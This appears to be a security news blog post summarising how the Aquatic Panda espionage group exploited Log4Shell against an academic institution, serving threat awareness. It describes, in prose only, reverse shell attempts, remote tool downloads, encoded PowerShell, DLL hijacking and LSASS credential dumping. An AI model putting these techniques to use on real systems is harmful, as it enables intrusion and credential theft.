January 23, 2022

TheCyberThrone

Thinking Security ! Always

Aquatic Panda Exploits With Log4j

Cyberespionage group Aquatic Panda linked with china was spotted exploiting the  Log4Shell vulnerability (CVE 2021-44228) in an attack aimed at a large academic institution.

The APT group is using a modified version of the Log4j exploit published on GitHub for performing reconnaissance

Advertisements

In the attack against the unnamed academic institution, threat actors targeted a VMware Horizon Tomcat web server that was using the Log4j library performing multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, running on the VMware Horizon instance and connecting back to the attacker-controlled DNS service.

The attackers executed multiple Linux commands on a Windows host on which the Apache Tomcat service was running, some of them with the intent to retrieve hacking tools from remote infrastructure.

The threat actor then executed a series of Linux commands, including attempting to execute a  bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat actor tooling hosted on remote infrastructure.

Then threat actor downloaded additional  scripts and then executed a Base64-encoded command via PowerShell to retrieve malware and three files with VBS file extensions from remote infrastructure. The files are a reverse shell, which was loaded into memory via DLL search-order hijacking

The APT group also made multiple attempts at credential harvesting by dumping the memory of the LSASS process using living-off-the-land binaries. The threat actor also leveraged winRAR to compress the memory dump for later exfiltration.

Advertisements

This intrusion was tracked by OverWatch closely in order to provide continuous updates to the victim organization. Based on which the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.

%d bloggers like this: